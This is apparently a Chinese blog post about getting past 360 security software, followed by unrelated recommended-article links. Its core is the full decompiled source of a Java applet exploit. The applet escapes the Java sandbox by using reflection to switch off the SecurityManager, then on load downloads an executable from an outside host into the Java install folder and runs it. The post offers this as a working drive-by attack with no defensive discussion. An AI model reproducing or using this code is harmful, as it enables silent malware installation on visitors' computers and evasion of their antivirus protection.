360阻止了java运行,Java破绽利用-jre安装路径绕过360拦截

最新推荐文章于 2022-09-19 13:17:17 发布
最新推荐文章于 2022-09-19 13:17:17 发布
阅读量940 收藏
点赞数
文章标签: Java Applet 安全漏洞 权限提升 反射 网络I/O

测试DEMO来自:http://shinewooyun.duapp.com/

编译成class后:

import java.applet.Applet;

import java.beans.Expression;

import java.beans.Statement;

import java.io.DataInputStream;

import java.io.DataOutputStream;

import java.io.FileOutputStream;

import java.io.IOException;

import java.lang.reflect.Field;

import java.net.HttpURLConnection;

import java.net.URL;

import java.security.AccessControlContext;

import java.security.AllPermission;

import java.security.CodeSource;

import java.security.Permissions;

import java.security.ProtectionDomain;

import java.security.cert.Certificate;

public class TestCVE3 extends Applet

{

public void disableSecurity()

throws Throwable

{

Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);

Permissions localPermissions = new Permissions();

localPermissions.add(new AllPermission());

ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);

AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] { localProtectionDomain });

SetField(Statement.class, "acc", localStatement, localAccessControlContext);

localStatement.execute();

}

private Class GetClass(String paramString)

throws Throwable

{

Object[] arrayOfObject = new Object[1];

arrayOfObject[0] = paramString;

Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);

localExpression.execute();

return (Class)localExpression.getValue();

}

private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)

throws Throwable

{

Object[] arrayOfObject = new Object[2];

arrayOfObject[0] = paramClass;

arrayOfObject[1] = paramString;

Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);

localExpression.execute();

((Field)localExpression.getValue()).set(paramObject1, paramObject2);

}

public void init()

{

try

{

disableSecurity();

downLoad("http://shinewooyun.duapp.com/360.exe", "C:/Program Files/Java/360.exe");

runFile("C:/Program Files/Java/360.exe");

}

catch (Exception localException)

{

localException.printStackTrace();

}

catch (Throwable localThrowable)

{

localThrowable.printStackTrace();

}

}

public void downLoad(String paramString1, String paramString2)

{

try

{

URL localURL = new URL(paramString1);

HttpURLConnection localHttpURLConnection = (HttpURLConnection)localURL.openConnection();

DataInputStream localDataInputStream = new DataInputStream(localHttpURLConnection.getInputStream());

DataOutputStream localDataOutputStream = new DataOutputStream(new FileOutputStream(paramString2));

byte[] arrayOfByte = new byte[4096];

int i = 0;

while ((i = localDataInputStream.read(arrayOfByte)) > 0) {

localDataOutputStream.write(arrayOfByte, 0, i);

}

localDataOutputStream.close();

localDataInputStream.close();

}

catch (Exception localException) {

localException.printStackTrace();

}

}

public void runFile(String paramString)

{

try

{

Runtime.getRuntime().exec(paramString);

}

catch (IOException localIOException) {

localIOException.printStackTrace();

}

}

}

weixin_39779467
关注
Java 环境配置 -- Java 语言的安装、配置、编译与运行
栗筝i的博客
06-09 3572
在这篇文章中,首先,我们将会先聊一聊 Java 的体系、环境、和版本,因为如果是刚入门的小伙伴,没有去特意了解的话,确实会存在相关的困惑(现在网上大多数文章对相关内容的介绍已经过时了);然后,我们会进行真正的开始,即 Java 语言的安装、配置、编译与运行;在最后,我们再了解一下,当下最为流行的 Java 开发 IDE 工具 – IntelliJ IDEA!
Java基础知识 1】Java入门级概述
热门推荐
学Java,找哪吒
09-25 15万+
CSDN最强Java专栏,包含全部Java基础知识点、Java8新特性、Java集合、Java多线程、Java代码实例,理论结合实战,实现Java的轻松学习。
360浏览器如何拦截java_安全卫士安装JAVA,但是还是被浏览器拦截
weixin_32123259的博客
03-01 1195
摘要正常的安装JAVA插件,并设置了环境变量,但是还是提示:Java插件11.181.2.13×86使用JRE版本1.8.0_181-b13JavaHotSpot(TM)ClientVM用户主目录=C:\\Users\\Administrator———————–…正常的安装JAVA插件,并设置了环境变量,但是还是提示:Java 插件11.181.2.13 x86使用 JRE 版本 1.8.0_...
java360运行不了_电脑360安全卫士打不开如何解决_360安全卫士无法打开的处理方法...
weixin_39770626的博客
02-28 705
为了更好地保护电脑安全,很多朋友都会在电脑中安装360安全卫士。但最近有网友却跟小编反映说,自己的电脑出现了360安全卫士打不开的情况,不知道怎么办很是苦恼,那么针对这一问题,今天本文就来为大家分享关于360安全卫士无法打开的处理方法。处理方法如下:1、首先去官方下载一个360安全卫士,重新安装。2、下载完成后打开文件夹,双击运行安装包;3、此时会弹出提示:“检测到已安装安全卫士,您确定要覆盖安装...
java360运行不了_“游戏玩不了”的解决方案
weixin_30895121的博客
02-28 447
方案一:请根据游戏报错安装以下相应的运行库程序。1.Microsoft Visual C++(简称VC):“没有找到Msvcp100.DLL”、“mfc100u.dll丢失”、“应用程序正常初始化(0xc0150002)失败”等常见问题。请按自己系统选择32位及64位,如果分不清系统是32位还是64位的,请下载32位并安装,32位系统最为常见。2.DirectX(简称DX)可以解决“d3dx_xx...
360浏览器9.1 禁用java,360浏览器解除网页禁用限制,实现右键复制的插件(Enable Copy)...
weixin_34282589的博客
03-13 2944
360浏览器分为极速版和普通版,在实际使用过程中,很多网友需要解除网页禁用限制,实现右键复制,那么今天小编为大家分享一款360浏览器解除网页禁用限制,实现右键复制的插件,这个插件叫做Enable Copy,不知道什么原因,这个插件在官方插件平台里是搜索不到的,这里免费分享给大家,希望给大家带去更多上网便利。360浏览器解除网页禁用限制,实现右键复制的插件(Enable Copy)下载地址如下:安装...
360阻碍手动修改注册表
ani_di的专栏
02-03 6612
今日,在使用regedt32修改注册表 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 下的项里,遇到一个很诡异的问题:可以创建或修改,但不能删除,而该项的权限设置里又有当前用户删除的权限。 Google之发现有人也遇到此问题,有可能是360禁止了。可以我没有打开360也这样?!早听说360已做到驱动级别,即使不运行
java源码包---java 源码 大量 实例
04-18
Java利用DES私钥对称加密代码实例 同上 java聊天室 2个目标文件,简单。 java模拟掷骰子2个 1个目标文件,输出演示。 java凭图游戏 一个目标文件,简单。 java求一个整数的因子 如题。 Java生成密钥的实例 1个...
java-11 windows-x64 安装
03-05
这个“java-11 windows-x64 安装包”是为了Windows 64位操作系统设计的,旨在为用户提供快速、简便的Java环境安装体验,尤其解决了在没有高速网络条件下的下载困扰。 首先,我们来详细了解一下Java 11的主要特性: ...
debian安装java8_如何使用Apt-Get在Debian 8上安装Java
weixin_39906878的博客
02-12 2048
介绍在Java编程语言和Java虚拟机或JVM被广泛使用,并且对于多种软件所需。本教程在Debian 8安装Java不同的方式:你可以下载默认JRE或JDK或甲骨文的JDK 。 如果您决定安装Oracle的Java的多个版本,你可以按照上一节管理Java 。 最后一节概述了设置JAVA_HOME环境变量先决条件要遵循本教程,您需要:一个Debian 8服务器。sudo的一个非root用户,您可以通...
JRE
Just do it!
05-20 4771
概念   Java Runtime Environment(JRE),Java运行环境,简单的理解就是Java程序运行所需要的必要环境。JRE主要包括三部分:Java虚拟机(JVM)、核心类库以及其他一些必要的工具。JDK是JRE的超集,运行Java程序要需要安装JRE即可。 JVM   Java虚拟机(Java Virtual Machine),可以运行Java字节码文件(c...
360浏览器怎么开java_360安全浏览器怎么打开javascript
weixin_32187075的博客
02-27 6705
如果您的浏览器不支持JavaScript功能或该功能被禁止,访问许多网站(包括本站)的时候有些功能就无法使用。我们建议您开启JavaScript功能以达到最佳的浏览效果,以下是可能的原因及开启方法:可能的原因一:您的浏览器可能不支持JavaScript如您的浏览器不支持JavaScript,您必须将浏览器的版本进行升级,我们推荐您使用 Firefox 火狐浏览器 或使用 IE6及更高版本。可能的原...
360 加载java报错_项目实战 —— Java项目运行报错及决绝方案
weixin_42619448的博客
02-23 463
单个SSM框架1、报LifecycleException,再配置一下jdk即可,然后再手动添加maven解决方法:然后,手动添加jar包2、maven 项目,右键maven build启动项目的时候,报下面错误,没有在pom配置tomcat7插件3、报找不到beans插件:更新一下项目就好4、也许你运行的是jre而不是jdk ,并且报MojoExCeption,这时候就要配置jdk了,步骤如下5、...
极速模式下java无法加载_谷歌和360急速模式 下的XMLHttpRequest 的onprogress事件失效...
weixin_31958413的博客
03-02 625
场景描述上传excel后遍历处理每一行的数据。想在页面上展示进度条,提示目前已经处理到第几条了。使用XMLHttpRequest2来发送请求,在程序服务器端设置HttpServletResponse的响应内容的长度为sheet的中的行数,然后每处理完一行数据使用getWriter().write()方法往前台发送一个字符,然后使用flushBuffer()刷新,按理来说会触发XMLHttpRequ...
Java安全之freemaker模版注入
AS011x的博客
09-19 1845
FreeMarker 是一款模板引擎: 即一种基于模板和要改变的数据, 并用来生成输出文本(HTML网页,电子邮件,配置文件,源代码等)的通用工具。在线手册:什么是 FreeMarker?- FreeMarker 中文官方参考手册模板文件存放在Web服务器上,当访问指定模版文件时, FreeMarker会动态转换模板,用最新的数据内容替换模板中${...}的部分,然后返回渲染结果。${...}: FreeMarker将会输出真实的值来替换大括号内的表达式,这样的表达式被称为(插值)
允许java运行不安全或不可信的应用程序
weixin_33795093的博客
04-17 1115
关于“应用程序已被安全设置阻止 您的安全设置以阻止使用已过期的或尚未生效的证书进行签名的应用程序运行”报错的解决办法。如图所示:将上述地址添加到java的“信任站点”中。方法是在控制面板中打开“java控制面板”(窗口显示可能为Configure Java,也有的直接叫做Java(xx位))。将想打开的java程序所在的地址加入到信任站点中即可。这样,再次操作时就会这样提醒:点击“继续”:此后就不...
您电脑上可能没有安装JRE插件或者该插件已被浏览器拦截,如果您确认没有安装JRE插件,请单击“确定“,页面将跳转到插件下载地址
rll755的博客
05-06 4916
换个浏览器,360浏览器就可以了,别在怼jre的问题了,TMD!!!!!!!!!!!!! 当然,要是还不行的话,再去怼jre呗。。。。。。
java解压ZIP文件并解决中文乱码问题
Angelo的博客
04-19 4484
场景:解压xxxx.zip文件(如果zip文件里面嵌套zip,市面上工具基本不支持,自己写个递归方法即可),中文文件名出现乱码 工具:zip4j(默认编码集UTF-8) 乱码原因: ZIP格式在不同平台上使用不同软件压缩: 1. Windows下使用WinRAR、好压、快压、百度压缩、360等工具压缩的文件 特点:文件名为GBK编码 2. 使用Linux、MacOS等系统压缩的zip文件 特...
提示没有安装JRE插件或者被浏览器拦截的解决方法
千寻的博客
07-01 2万+
文章目录出现问题第一步 确保Java环境安装好第二步 打开控制面板--查找到Java第三步 编辑站点列表第四步 再次访问网站注意 出现问题 第一步 确保Java环境安装java -version java version "1.8.0_251" Java(TM) SE Runtime Environment (build 1.8.0_251-b08) Java HotSpot(TM) 64-Bit Server VM (build 25.251-b08, mixed mode) 第二步 打开控制面
Java运行环境JRE-8U261-B34 for Windows x64安装指南
- jre-8u261-windows-x64.exe:这是一个Windows平台上的可执行安装包,用户可以通过双击该文件开始安装Java运行环境。 - jre-8u261-windows-x64.tar.gz:这是一个压缩包格式的安装文件,适用于使用类Unix操作系统的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值